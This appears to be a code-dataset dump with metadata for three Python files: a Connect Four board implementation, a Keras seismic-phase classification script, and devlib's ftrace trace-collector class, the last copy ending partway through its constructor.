hexsha
stringlengths 40
40
| size
int64 2
1.02M
| ext
stringclasses 10
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 4
245
| max_stars_repo_name
stringlengths 6
130
| max_stars_repo_head_hexsha
stringlengths 40
40
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 4
245
| max_issues_repo_name
stringlengths 6
130
| max_issues_repo_head_hexsha
stringlengths 40
40
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 4
245
| max_forks_repo_name
stringlengths 6
130
| max_forks_repo_head_hexsha
stringlengths 40
40
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 2
1.02M
| avg_line_length
float64 1
417k
| max_line_length
int64 1
987k
| alphanum_fraction
float64 0
1
| content_no_comment
stringlengths 0
1.01M
| is_comment_constant_removed
bool 1
class | is_sharp_comment_removed
bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
1c3e768600e54d3c1c007e307058c3b2ee2dfba3
| 4,554
|
py
|
Python
|
board.py
|
SebBlin/p4
|
342753a1e9bf018751cf0f4eff69e8f240df53e7
|
[
"MIT"
] | 1
|
2020-06-14T19:10:35.000Z
|
2020-06-14T19:10:35.000Z
|
board.py
|
SebBlin/p4
|
342753a1e9bf018751cf0f4eff69e8f240df53e7
|
[
"MIT"
] | null | null | null |
board.py
|
SebBlin/p4
|
342753a1e9bf018751cf0f4eff69e8f240df53e7
|
[
"MIT"
] | null | null | null |
import numpy as np
import hashlib
nbcol = 7
nbligne = 6
pion = [' ', 'X', 'O']
def print_top_line():
print(u'\u250c', end = '')
for _ in range(nbcol-1):
print(u'\u2500\u252c', sep = '', end = '')
print(u'\u2500\u2510')
def print_mid_line_empty(tab_line):
for i in range(nbcol):
print(u'\u2502',pion[tab_line[i]], sep = '', end = '')
print(u'\u2502')
def print_mid_line_full():
print(u'\u251c', end = '')
for _ in range(nbcol-1):
print(u'\u2500\u253c', end = '')
print(u'\u2500\u2524')
def print_bottom_line():
print(u'\u2514', end = '')
for _ in range(nbcol-1):
print(u'\u2500\u2534', end = '')
print(u'\u2500\u2518')
def print_numbers():
print(" ", end = '')
for i in range(nbcol):
print(i, end = '')
print(' ', end = '')
print()
def get_diagonal_gauche(g):
tab=[]
for d in range(6):
i = min(d+3,nbcol-1)
j = max(0,d-3)
l=[]
while i>=0 and j<=nbligne-1 :
l.append(g[j,i])
i-=1
j+=1
tab.append(l)
return tab
def get_diagonal_droite(g):
tab=[]
for d in range(7):
i = max(0,d-2)
j = max(2-d,0)
l=[]
while i<nbcol and j<nbligne :
#print ('i=',i,'j=',j, 'x=',g[j,i] )
l.append(g[j,i])
i+=1
j+=1
tab.append(l)
return tab
def get_horizontal(g):
return g
def get_vertical(g):
return g.T
def test_4_successif (ligne,joueur):
for i in range (len(ligne)-3):
if (ligne[i] == joueur and ligne[i+1] == joueur and ligne[i+2] == joueur and ligne[i+3] == joueur):
return True
return False
class Board(object):
def __init__(self, grille = None):
if grille is None:
self.grille = np.array([
[0,0,0,0,0,0,0],
[0,0,0,0,0,0,0],
[0,0,0,0,0,0,0],
[0,0,0,0,0,0,0],
[0,0,0,0,0,0,0],
[0,0,0,0,0,0,0],
])
else:
self.grille = grille.copy()
self.num_play = 0
self.moves = []
self.height = [0, 7, 14, 21, 28, 35, 42]
self.bitboard = [0]*2
def print_board(self):
print_top_line()
for i in range(nbligne-1):
print_mid_line_empty(self.grille[i])
print_mid_line_full()
print_mid_line_empty(self.grille[nbligne-1])
print_bottom_line()
print_numbers()
def play(self,col, label):
play_row_in_col = nbligne - 1 - np.count_nonzero(self.grille.T[col])
self.grille[play_row_in_col,col] = label
self.num_play +=1
self.height[col] += 1
move = 1 << self.height[col]
self.bitboard[self.num_play & 1] ^= move
self.moves.append(col)
def copy(self):
new_board = Board()
new_board.grille = self.grille.copy()
new_board.num_play = self.num_play
new_board.bitboard = self.bitboard.copy()
new_board.moves = self.moves.copy()
new_board.height = self.height.copy()
return new_board
def can_play(self, move):
return self.grille[0,move] == 0
def get_hash(self):
return hashlib.sha256(self.grille.tobytes()).hexdigest()
def is_won(self,player):
for l in get_horizontal(self.grille):
if test_4_successif(l,player):
return player
for l in get_vertical(self.grille):
if test_4_successif(l,player):
return player
for l in get_diagonal_gauche(self.grille):
if test_4_successif(l,player):
return player
for l in get_diagonal_droite(self.grille):
if test_4_successif(l,player):
return player
return 0
def is_won_quick(self, player):
directions = [1, 6, 7, 8]
bb_player = self.bitboard[player & 1]
bb = 0
for d in directions:
bb = bb_player & (bb_player >> d)
if ((bb & (bb >> (2* d))) != 0):
return True
return False
# boolean isWin(long bitboard) {
# int[] directions = {1, 7, 6, 8};
# long bb;
# for(int direction : directions) {
# bb = bitboard & (bitboard >> direction);
# if ((bb & (bb >> (2 * direction))) != 0) return true;
# }
# return false;
# }
| 27.433735
| 107
| 0.504172
|
import numpy as np
import hashlib
nbcol = 7
nbligne = 6
pion = [' ', 'X', 'O']
def print_top_line():
print(u'\u250c', end = '')
for _ in range(nbcol-1):
print(u'\u2500\u252c', sep = '', end = '')
print(u'\u2500\u2510')
def print_mid_line_empty(tab_line):
for i in range(nbcol):
print(u'\u2502',pion[tab_line[i]], sep = '', end = '')
print(u'\u2502')
def print_mid_line_full():
print(u'\u251c', end = '')
for _ in range(nbcol-1):
print(u'\u2500\u253c', end = '')
print(u'\u2500\u2524')
def print_bottom_line():
print(u'\u2514', end = '')
for _ in range(nbcol-1):
print(u'\u2500\u2534', end = '')
print(u'\u2500\u2518')
def print_numbers():
print(" ", end = '')
for i in range(nbcol):
print(i, end = '')
print(' ', end = '')
print()
def get_diagonal_gauche(g):
tab=[]
for d in range(6):
i = min(d+3,nbcol-1)
j = max(0,d-3)
l=[]
while i>=0 and j<=nbligne-1 :
l.append(g[j,i])
i-=1
j+=1
tab.append(l)
return tab
def get_diagonal_droite(g):
tab=[]
for d in range(7):
i = max(0,d-2)
j = max(2-d,0)
l=[]
while i<nbcol and j<nbligne :
l.append(g[j,i])
i+=1
j+=1
tab.append(l)
return tab
def get_horizontal(g):
return g
def get_vertical(g):
return g.T
def test_4_successif (ligne,joueur):
for i in range (len(ligne)-3):
if (ligne[i] == joueur and ligne[i+1] == joueur and ligne[i+2] == joueur and ligne[i+3] == joueur):
return True
return False
class Board(object):
def __init__(self, grille = None):
if grille is None:
self.grille = np.array([
[0,0,0,0,0,0,0],
[0,0,0,0,0,0,0],
[0,0,0,0,0,0,0],
[0,0,0,0,0,0,0],
[0,0,0,0,0,0,0],
[0,0,0,0,0,0,0],
])
else:
self.grille = grille.copy()
self.num_play = 0
self.moves = []
self.height = [0, 7, 14, 21, 28, 35, 42]
self.bitboard = [0]*2
def print_board(self):
print_top_line()
for i in range(nbligne-1):
print_mid_line_empty(self.grille[i])
print_mid_line_full()
print_mid_line_empty(self.grille[nbligne-1])
print_bottom_line()
print_numbers()
def play(self,col, label):
play_row_in_col = nbligne - 1 - np.count_nonzero(self.grille.T[col])
self.grille[play_row_in_col,col] = label
self.num_play +=1
self.height[col] += 1
move = 1 << self.height[col]
self.bitboard[self.num_play & 1] ^= move
self.moves.append(col)
def copy(self):
new_board = Board()
new_board.grille = self.grille.copy()
new_board.num_play = self.num_play
new_board.bitboard = self.bitboard.copy()
new_board.moves = self.moves.copy()
new_board.height = self.height.copy()
return new_board
def can_play(self, move):
return self.grille[0,move] == 0
def get_hash(self):
return hashlib.sha256(self.grille.tobytes()).hexdigest()
def is_won(self,player):
for l in get_horizontal(self.grille):
if test_4_successif(l,player):
return player
for l in get_vertical(self.grille):
if test_4_successif(l,player):
return player
for l in get_diagonal_gauche(self.grille):
if test_4_successif(l,player):
return player
for l in get_diagonal_droite(self.grille):
if test_4_successif(l,player):
return player
return 0
def is_won_quick(self, player):
directions = [1, 6, 7, 8]
bb_player = self.bitboard[player & 1]
bb = 0
for d in directions:
bb = bb_player & (bb_player >> d)
if ((bb & (bb >> (2* d))) != 0):
return True
return False
| true
| true
|
1c3e769abaf60b187cfc57bec702401e64629712
| 6,620
|
py
|
Python
|
phase_classification_features.py
|
cahya-wirawan/phase-detection
|
ca65442c4f2a30004a17cf79cbe54cf9c2f6925d
|
[
"MIT"
] | null | null | null |
phase_classification_features.py
|
cahya-wirawan/phase-detection
|
ca65442c4f2a30004a17cf79cbe54cf9c2f6925d
|
[
"MIT"
] | null | null | null |
phase_classification_features.py
|
cahya-wirawan/phase-detection
|
ca65442c4f2a30004a17cf79cbe54cf9c2f6925d
|
[
"MIT"
] | null | null | null |
import argparse
import numpy as np
from keras.wrappers.scikit_learn import KerasClassifier
from keras.callbacks import ModelCheckpoint, TensorBoard
from keras.models import load_model
from sklearn.model_selection import cross_val_score
from sklearn.model_selection import KFold
from sklearn.metrics import confusion_matrix
from phase_utils import print_cm
from phase_features_loader import PhaseFeaturesLoader
from phase_model_simple import model_simple
from phase_model_resnet import model_resnet
if __name__ == "__main__":
parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument("-a", "--action", choices=["train", "test"], default="train",
help="set the action, either training or test the dataset")
parser.add_argument("--train_dataset", default="data/phase/ml_features_train.csv",
help="set the path to the training dataset")
parser.add_argument("--test_dataset", default="data/phase/ml_features_test.csv",
help="set the path to the test dataset")
parser.add_argument("-m", "--model", default=None,
help="set the path to the pre-trained model/weights")
parser.add_argument("--cv", type=bool, default=False,
help="enable / disable a full cross validation with n_splits=10")
parser.add_argument("-b", "--batch_size", type=int, default=256,
help="set the batch size)")
parser.add_argument("-e", "--epochs", type=int, default=2000,
help="set the epochs number)")
parser.add_argument("-l", "--layers", default="128 128 64 48 48 32 32 48 32 16",
help="set the hidden layers)")
parser.add_argument("-d", "--dropout", type=float, default=0.1,
help="set the dropout)")
parser.add_argument("-s", "--stations", default="URZ",
help="set the station name, it supports currently only LPAZ and URZ")
parser.add_argument("-v", "--verbose", type=int, default=0,
help="set the verbosity)")
parser.add_argument("-p", "--phase_length", default="URZ 6840 6840 6840 20520",
help="set the number of entries of phases per stations to be read from the dataset.\n" +
"The default is for the training, for the test use 'URZ 2280 2280 2280 6840, " +
"LPAZ 160 160 160 480'")
args = parser.parse_args()
# fix random seed for reproducibility
seed = 7
np.random.seed(seed)
epochs = args.epochs
train_dataset = args.train_dataset
test_dataset = args.test_dataset
phase_length = {}
try:
for p in args.phase_length.split(","):
s = p.strip().split(" ")
phase_length.update({s[0]:{"regP": int(s[1]), "regS": int(s[2]), "tele": int(s[3]), "N": int(s[4])}})
except ValueError:
print("It should be a list of a station name followed by four numbers.")
exit(1)
stations_lower = [station.lower() for station in sorted(phase_length.keys())]
layers = []
try:
layers = [int(units) for units in args.layers.split(" ")]
except ValueError:
print("The layers should be a list of integer, delimited by a whitespace")
exit(1)
dropout = args.dropout
batch_size = args.batch_size
validation_split = 0.1
if args.model is None:
model_file_path = "results/phase_weights_best_s_{}_l_{}_d_{}.hdf5".\
format("_".join(stations_lower), "_".join([str(layer) for layer in layers]), dropout)
else:
model_file_path = args.model
model = model_resnet
if args.action == "train":
# load train dataset
pd = PhaseFeaturesLoader(filename=train_dataset, validation_split=validation_split,
phase_length=phase_length, batch_size=batch_size)
tensorboard = TensorBoard(log_dir='graph', histogram_freq=0, write_graph=True, write_images=True)
checkpoint = ModelCheckpoint(model_file_path, monitor='acc', verbose=args.verbose,
save_best_only=True, mode='max')
if args.cv:
train_x, train_y = pd.get_dataset()
kfold = KFold(n_splits=10, shuffle=True, random_state=seed)
estimator = KerasClassifier(build_fn=model, layers=layers, dropout=dropout,
epochs=epochs, batch_size=500, verbose=args.verbose)
results = cross_val_score(estimator, train_x, train_y, cv=kfold,
fit_params={'callbacks':[checkpoint, tensorboard]})
print("Baseline: %.2f%% (%.2f%%)" % (results.mean()*100, results.std()*100))
else:
model = model(layers=layers, dropout=dropout, layer_number=10)
print(model.summary())
class_weight = {0:1, 1:1, 2:1, 3:1}
history = model.fit_generator(generator = pd.generate("train"),
steps_per_epoch = pd.get_len("train")//batch_size,
validation_data = pd.generate("validation"),
validation_steps = pd.get_len("validation")//batch_size,
use_multiprocessing=True, class_weight=None,
epochs=epochs, verbose=args.verbose, callbacks=[checkpoint, tensorboard])
print("Max of acc: {}, val_acc: {}".
format(max(history.history["acc"]), max(history.history["val_acc"])))
print("Min of loss: {}, val_loss: {}".
format(min(history.history["loss"]), min(history.history["val_loss"])))
else:
# load test dataset
pd = PhaseFeaturesLoader(filename=test_dataset, phase_length=phase_length, batch_size=batch_size)
test_x, test_y = pd.get_dataset()
# load model & weight
loaded_model = load_model(model_file_path)
print("Loaded model from disk")
# evaluate loaded model on test data
loaded_model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])
score = loaded_model.evaluate(test_x, test_y, verbose=0)
prediction = loaded_model.predict(test_x, verbose=0)
print("%s: %.2f%%" % (loaded_model.metrics_names[1], score[1]*100))
print("Confusion matrix:")
phases = ['regP', 'regS', 'tele', 'N']
cm = confusion_matrix(test_y.argmax(axis=1), prediction.argmax(axis=1))
print_cm(cm, labels=phases)
| 52.539683
| 113
| 0.616163
|
import argparse
import numpy as np
from keras.wrappers.scikit_learn import KerasClassifier
from keras.callbacks import ModelCheckpoint, TensorBoard
from keras.models import load_model
from sklearn.model_selection import cross_val_score
from sklearn.model_selection import KFold
from sklearn.metrics import confusion_matrix
from phase_utils import print_cm
from phase_features_loader import PhaseFeaturesLoader
from phase_model_simple import model_simple
from phase_model_resnet import model_resnet
if __name__ == "__main__":
parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument("-a", "--action", choices=["train", "test"], default="train",
help="set the action, either training or test the dataset")
parser.add_argument("--train_dataset", default="data/phase/ml_features_train.csv",
help="set the path to the training dataset")
parser.add_argument("--test_dataset", default="data/phase/ml_features_test.csv",
help="set the path to the test dataset")
parser.add_argument("-m", "--model", default=None,
help="set the path to the pre-trained model/weights")
parser.add_argument("--cv", type=bool, default=False,
help="enable / disable a full cross validation with n_splits=10")
parser.add_argument("-b", "--batch_size", type=int, default=256,
help="set the batch size)")
parser.add_argument("-e", "--epochs", type=int, default=2000,
help="set the epochs number)")
parser.add_argument("-l", "--layers", default="128 128 64 48 48 32 32 48 32 16",
help="set the hidden layers)")
parser.add_argument("-d", "--dropout", type=float, default=0.1,
help="set the dropout)")
parser.add_argument("-s", "--stations", default="URZ",
help="set the station name, it supports currently only LPAZ and URZ")
parser.add_argument("-v", "--verbose", type=int, default=0,
help="set the verbosity)")
parser.add_argument("-p", "--phase_length", default="URZ 6840 6840 6840 20520",
help="set the number of entries of phases per stations to be read from the dataset.\n" +
"The default is for the training, for the test use 'URZ 2280 2280 2280 6840, " +
"LPAZ 160 160 160 480'")
args = parser.parse_args()
seed = 7
np.random.seed(seed)
epochs = args.epochs
train_dataset = args.train_dataset
test_dataset = args.test_dataset
phase_length = {}
try:
for p in args.phase_length.split(","):
s = p.strip().split(" ")
phase_length.update({s[0]:{"regP": int(s[1]), "regS": int(s[2]), "tele": int(s[3]), "N": int(s[4])}})
except ValueError:
print("It should be a list of a station name followed by four numbers.")
exit(1)
stations_lower = [station.lower() for station in sorted(phase_length.keys())]
layers = []
try:
layers = [int(units) for units in args.layers.split(" ")]
except ValueError:
print("The layers should be a list of integer, delimited by a whitespace")
exit(1)
dropout = args.dropout
batch_size = args.batch_size
validation_split = 0.1
if args.model is None:
model_file_path = "results/phase_weights_best_s_{}_l_{}_d_{}.hdf5".\
format("_".join(stations_lower), "_".join([str(layer) for layer in layers]), dropout)
else:
model_file_path = args.model
model = model_resnet
if args.action == "train":
pd = PhaseFeaturesLoader(filename=train_dataset, validation_split=validation_split,
phase_length=phase_length, batch_size=batch_size)
tensorboard = TensorBoard(log_dir='graph', histogram_freq=0, write_graph=True, write_images=True)
checkpoint = ModelCheckpoint(model_file_path, monitor='acc', verbose=args.verbose,
save_best_only=True, mode='max')
if args.cv:
train_x, train_y = pd.get_dataset()
kfold = KFold(n_splits=10, shuffle=True, random_state=seed)
estimator = KerasClassifier(build_fn=model, layers=layers, dropout=dropout,
epochs=epochs, batch_size=500, verbose=args.verbose)
results = cross_val_score(estimator, train_x, train_y, cv=kfold,
fit_params={'callbacks':[checkpoint, tensorboard]})
print("Baseline: %.2f%% (%.2f%%)" % (results.mean()*100, results.std()*100))
else:
model = model(layers=layers, dropout=dropout, layer_number=10)
print(model.summary())
class_weight = {0:1, 1:1, 2:1, 3:1}
history = model.fit_generator(generator = pd.generate("train"),
steps_per_epoch = pd.get_len("train")//batch_size,
validation_data = pd.generate("validation"),
validation_steps = pd.get_len("validation")//batch_size,
use_multiprocessing=True, class_weight=None,
epochs=epochs, verbose=args.verbose, callbacks=[checkpoint, tensorboard])
print("Max of acc: {}, val_acc: {}".
format(max(history.history["acc"]), max(history.history["val_acc"])))
print("Min of loss: {}, val_loss: {}".
format(min(history.history["loss"]), min(history.history["val_loss"])))
else:
pd = PhaseFeaturesLoader(filename=test_dataset, phase_length=phase_length, batch_size=batch_size)
test_x, test_y = pd.get_dataset()
loaded_model = load_model(model_file_path)
print("Loaded model from disk")
loaded_model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])
score = loaded_model.evaluate(test_x, test_y, verbose=0)
prediction = loaded_model.predict(test_x, verbose=0)
print("%s: %.2f%%" % (loaded_model.metrics_names[1], score[1]*100))
print("Confusion matrix:")
phases = ['regP', 'regS', 'tele', 'N']
cm = confusion_matrix(test_y.argmax(axis=1), prediction.argmax(axis=1))
print_cm(cm, labels=phases)
| true
| true
|
1c3e769dcf5543050992240a4de1783bd64c6643
| 15,400
|
py
|
Python
|
devlib/trace/ftrace.py
|
douglas-raillard-arm/devlib
|
e3d9c4b2fdf5b878b51204713c34d7fc6dd6b305
|
[
"Apache-2.0"
] | null | null | null |
devlib/trace/ftrace.py
|
douglas-raillard-arm/devlib
|
e3d9c4b2fdf5b878b51204713c34d7fc6dd6b305
|
[
"Apache-2.0"
] | null | null | null |
devlib/trace/ftrace.py
|
douglas-raillard-arm/devlib
|
e3d9c4b2fdf5b878b51204713c34d7fc6dd6b305
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2015 ARM Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import division
import os
import json
import time
import re
import subprocess
from devlib.trace import TraceCollector
from devlib.host import PACKAGE_BIN_DIRECTORY
from devlib.exception import TargetError, HostError
from devlib.utils.misc import check_output, which
TRACE_MARKER_START = 'TRACE_MARKER_START'
TRACE_MARKER_STOP = 'TRACE_MARKER_STOP'
OUTPUT_TRACE_FILE = 'trace.dat'
OUTPUT_PROFILE_FILE = 'trace_stat.dat'
DEFAULT_EVENTS = [
'cpu_frequency',
'cpu_idle',
'sched_migrate_task',
'sched_process_exec',
'sched_process_fork',
'sched_stat_iowait',
'sched_switch',
'sched_wakeup',
'sched_wakeup_new',
]
TIMEOUT = 180
# Regexps for parsing of function profiling data
CPU_RE = re.compile(r' Function \(CPU([0-9]+)\)')
STATS_RE = re.compile(r'([^ ]*) +([0-9]+) +([0-9.]+) us +([0-9.]+) us +([0-9.]+) us')
class FtraceCollector(TraceCollector):
def __init__(self, target,
events=None,
functions=None,
buffer_size=None,
buffer_size_step=1000,
tracing_path='/sys/kernel/debug/tracing',
automark=True,
autoreport=True,
autoview=False,
no_install=False,
strict=False,
report_on_target=False,
):
super(FtraceCollector, self).__init__(target)
self.events = events if events is not None else DEFAULT_EVENTS
self.functions = functions
self.buffer_size = buffer_size
self.buffer_size_step = buffer_size_step
self.tracing_path = tracing_path
self.automark = automark
self.autoreport = autoreport
self.autoview = autoview
self.report_on_target = report_on_target
self.target_output_file = target.path.join(self.target.working_directory, OUTPUT_TRACE_FILE)
text_file_name = target.path.splitext(OUTPUT_TRACE_FILE)[0] + '.txt'
self.target_text_file = target.path.join(self.target.working_directory, text_file_name)
self.target_binary = None
self.host_binary = None
self.start_time = None
self.stop_time = None
self.event_string = None
self.function_string = None
self._reset_needed = True
# Setup tracing paths
self.available_events_file = self.target.path.join(self.tracing_path, 'available_events')
self.available_functions_file = self.target.path.join(self.tracing_path, 'available_filter_functions')
self.buffer_size_file = self.target.path.join(self.tracing_path, 'buffer_size_kb')
self.current_tracer_file = self.target.path.join(self.tracing_path, 'current_tracer')
self.function_profile_file = self.target.path.join(self.tracing_path, 'function_profile_enabled')
self.marker_file = self.target.path.join(self.tracing_path, 'trace_marker')
self.ftrace_filter_file = self.target.path.join(self.tracing_path, 'set_ftrace_filter')
self.host_binary = which('trace-cmd')
self.kernelshark = which('kernelshark')
if not self.target.is_rooted:
raise TargetError('trace-cmd instrument cannot be used on an unrooted device.')
if self.autoreport and not self.report_on_target and self.host_binary is None:
raise HostError('trace-cmd binary must be installed on the host if autoreport=True.')
if self.autoview and self.kernelshark is None:
raise HostError('kernelshark binary must be installed on the host if autoview=True.')
if not no_install:
host_file = os.path.join(PACKAGE_BIN_DIRECTORY, self.target.abi, 'trace-cmd')
self.target_binary = self.target.install(host_file)
else:
if not self.target.is_installed('trace-cmd'):
raise TargetError('No trace-cmd found on device and no_install=True is specified.')
self.target_binary = 'trace-cmd'
# Validate required events to be traced
available_events = self.target.execute(
'cat {}'.format(self.available_events_file),
as_root=True).splitlines()
selected_events = []
for event in self.events:
# Convert globs supported by FTrace into valid regexp globs
_event = event
if event[0] != '*':
_event = '*' + event
event_re = re.compile(_event.replace('*', '.*'))
# Select events matching the required ones
if len(filter(event_re.match, available_events)) == 0:
message = 'Event [{}] not available for tracing'.format(event)
if strict:
raise TargetError(message)
self.target.logger.warning(message)
else:
selected_events.append(event)
# If function profiling is enabled we always need at least one event.
# Thus, if not other events have been specified, try to add at least
# a tracepoint which is always available and possibly triggered few
# times.
if self.functions and len(selected_events) == 0:
selected_events = ['sched_wakeup_new']
self.event_string = _build_trace_events(selected_events)
# Check for function tracing support
if self.functions:
if not self.target.file_exists(self.function_profile_file):
raise TargetError('Function profiling not supported. '\
'A kernel build with CONFIG_FUNCTION_PROFILER enable is required')
# Validate required functions to be traced
available_functions = self.target.execute(
'cat {}'.format(self.available_functions_file),
as_root=True).splitlines()
selected_functions = []
for function in self.functions:
if function not in available_functions:
message = 'Function [{}] not available for profiling'.format(function)
if strict:
raise TargetError(message)
self.target.logger.warning(message)
else:
selected_functions.append(function)
self.function_string = _build_trace_functions(selected_functions)
def reset(self):
if self.buffer_size:
self._set_buffer_size()
self.target.execute('{} reset'.format(self.target_binary),
as_root=True, timeout=TIMEOUT)
self._reset_needed = False
def start(self):
self.start_time = time.time()
if self._reset_needed:
self.reset()
self.target.execute('{} start {}'.format(self.target_binary, self.event_string),
as_root=True)
if self.automark:
self.mark_start()
if 'cpufreq' in self.target.modules:
self.logger.debug('Trace CPUFreq frequencies')
self.target.cpufreq.trace_frequencies()
if 'cpuidle' in self.target.modules:
self.logger.debug('Trace CPUIdle states')
self.target.cpuidle.perturb_cpus()
# Enable kernel function profiling
if self.functions:
self.target.execute('echo nop > {}'.format(self.current_tracer_file),
as_root=True)
self.target.execute('echo 0 > {}'.format(self.function_profile_file),
as_root=True)
self.target.execute('echo {} > {}'.format(self.function_string, self.ftrace_filter_file),
as_root=True)
self.target.execute('echo 1 > {}'.format(self.function_profile_file),
as_root=True)
def stop(self):
# Disable kernel function profiling
if self.functions:
self.target.execute('echo 1 > {}'.format(self.function_profile_file),
as_root=True)
if 'cpufreq' in self.target.modules:
self.logger.debug('Trace CPUFreq frequencies')
self.target.cpufreq.trace_frequencies()
self.stop_time = time.time()
if self.automark:
self.mark_stop()
self.target.execute('{} stop'.format(self.target_binary),
timeout=TIMEOUT, as_root=True)
self._reset_needed = True
def get_trace(self, outfile):
if os.path.isdir(outfile):
outfile = os.path.join(outfile, os.path.basename(self.target_output_file))
self.target.execute('{0} extract -o {1}; chmod 666 {1}'.format(self.target_binary,
self.target_output_file),
timeout=TIMEOUT, as_root=True)
# The size of trace.dat will depend on how long trace-cmd was running.
# Therefore timout for the pull command must also be adjusted
# accordingly.
pull_timeout = 10 * (self.stop_time - self.start_time)
self.target.pull(self.target_output_file, outfile, timeout=pull_timeout)
if not os.path.isfile(outfile):
self.logger.warning('Binary trace not pulled from device.')
else:
if self.autoreport:
textfile = os.path.splitext(outfile)[0] + '.txt'
if self.report_on_target:
self.generate_report_on_target()
self.target.pull(self.target_text_file,
textfile, timeout=pull_timeout)
else:
self.report(outfile, textfile)
if self.autoview:
self.view(outfile)
def get_stats(self, outfile):
if not self.functions:
return
if os.path.isdir(outfile):
outfile = os.path.join(outfile, OUTPUT_PROFILE_FILE)
output = self.target._execute_util('ftrace_get_function_stats',
as_root=True)
function_stats = {}
for line in output.splitlines():
# Match a new CPU dataset
match = CPU_RE.search(line)
if match:
cpu_id = int(match.group(1))
function_stats[cpu_id] = {}
self.logger.debug("Processing stats for CPU%d...", cpu_id)
continue
# Match a new function dataset
match = STATS_RE.search(line)
if match:
fname = match.group(1)
function_stats[cpu_id][fname] = {
'hits' : int(match.group(2)),
'time' : float(match.group(3)),
'avg' : float(match.group(4)),
's_2' : float(match.group(5)),
}
self.logger.debug(" %s: %s",
fname, function_stats[cpu_id][fname])
self.logger.debug("FTrace stats output [%s]...", outfile)
with open(outfile, 'w') as fh:
json.dump(function_stats, fh, indent=4)
self.logger.debug("FTrace function stats save in [%s]", outfile)
return function_stats
def report(self, binfile, destfile):
# To get the output of trace.dat, trace-cmd must be installed
# This is done host-side because the generated file is very large
try:
command = '{} report {} > {}'.format(self.host_binary, binfile, destfile)
self.logger.debug(command)
process = subprocess.Popen(command, stderr=subprocess.PIPE, shell=True)
_, error = process.communicate()
if process.returncode:
raise TargetError('trace-cmd returned non-zero exit code {}'.format(process.returncode))
if error:
# logged at debug level, as trace-cmd always outputs some
# errors that seem benign.
self.logger.debug(error)
if os.path.isfile(destfile):
self.logger.debug('Verifying traces.')
with open(destfile) as fh:
for line in fh:
if 'EVENTS DROPPED' in line:
self.logger.warning('Dropped events detected.')
break
else:
self.logger.debug('Trace verified.')
else:
self.logger.warning('Could not generate trace.txt.')
except OSError:
raise HostError('Could not find trace-cmd. Please make sure it is installed and is in PATH.')
def generate_report_on_target(self):
command = '{} report {} > {}'.format(self.target_binary,
self.target_output_file,
self.target_text_file)
self.target.execute(command, timeout=TIMEOUT)
def view(self, binfile):
check_output('{} {}'.format(self.kernelshark, binfile), shell=True)
def teardown(self):
self.target.remove(self.target.path.join(self.target.working_directory, OUTPUT_TRACE_FILE))
def mark_start(self):
self.target.write_value(self.marker_file, TRACE_MARKER_START, verify=False)
def mark_stop(self):
self.target.write_value(self.marker_file, TRACE_MARKER_STOP, verify=False)
def _set_buffer_size(self):
target_buffer_size = self.buffer_size
attempt_buffer_size = target_buffer_size
buffer_size = 0
floor = 1000 if target_buffer_size > 1000 else target_buffer_size
while attempt_buffer_size >= floor:
self.target.write_value(self.buffer_size_file, attempt_buffer_size, verify=False)
buffer_size = self.target.read_int(self.buffer_size_file)
if buffer_size == attempt_buffer_size:
break
else:
attempt_buffer_size -= self.buffer_size_step
if buffer_size == target_buffer_size:
return
while attempt_buffer_size < target_buffer_size:
attempt_buffer_size += self.buffer_size_step
self.target.write_value(self.buffer_size_file, attempt_buffer_size, verify=False)
buffer_size = self.target.read_int(self.buffer_size_file)
if attempt_buffer_size != buffer_size:
message = 'Failed to set trace buffer size to {}, value set was {}'
self.logger.warning(message.format(target_buffer_size, buffer_size))
break
def _build_trace_events(events):
event_string = ' '.join(['-e {}'.format(e) for e in events])
return event_string
def _build_trace_functions(functions):
function_string = " ".join(functions)
return function_string
| 44.252874
| 110
| 0.603117
|
from __future__ import division
import os
import json
import time
import re
import subprocess
from devlib.trace import TraceCollector
from devlib.host import PACKAGE_BIN_DIRECTORY
from devlib.exception import TargetError, HostError
from devlib.utils.misc import check_output, which
TRACE_MARKER_START = 'TRACE_MARKER_START'
TRACE_MARKER_STOP = 'TRACE_MARKER_STOP'
OUTPUT_TRACE_FILE = 'trace.dat'
OUTPUT_PROFILE_FILE = 'trace_stat.dat'
DEFAULT_EVENTS = [
'cpu_frequency',
'cpu_idle',
'sched_migrate_task',
'sched_process_exec',
'sched_process_fork',
'sched_stat_iowait',
'sched_switch',
'sched_wakeup',
'sched_wakeup_new',
]
TIMEOUT = 180
CPU_RE = re.compile(r' Function \(CPU([0-9]+)\)')
STATS_RE = re.compile(r'([^ ]*) +([0-9]+) +([0-9.]+) us +([0-9.]+) us +([0-9.]+) us')
class FtraceCollector(TraceCollector):
def __init__(self, target,
events=None,
functions=None,
buffer_size=None,
buffer_size_step=1000,
tracing_path='/sys/kernel/debug/tracing',
automark=True,
autoreport=True,
autoview=False,
no_install=False,
strict=False,
report_on_target=False,
):
super(FtraceCollector, self).__init__(target)
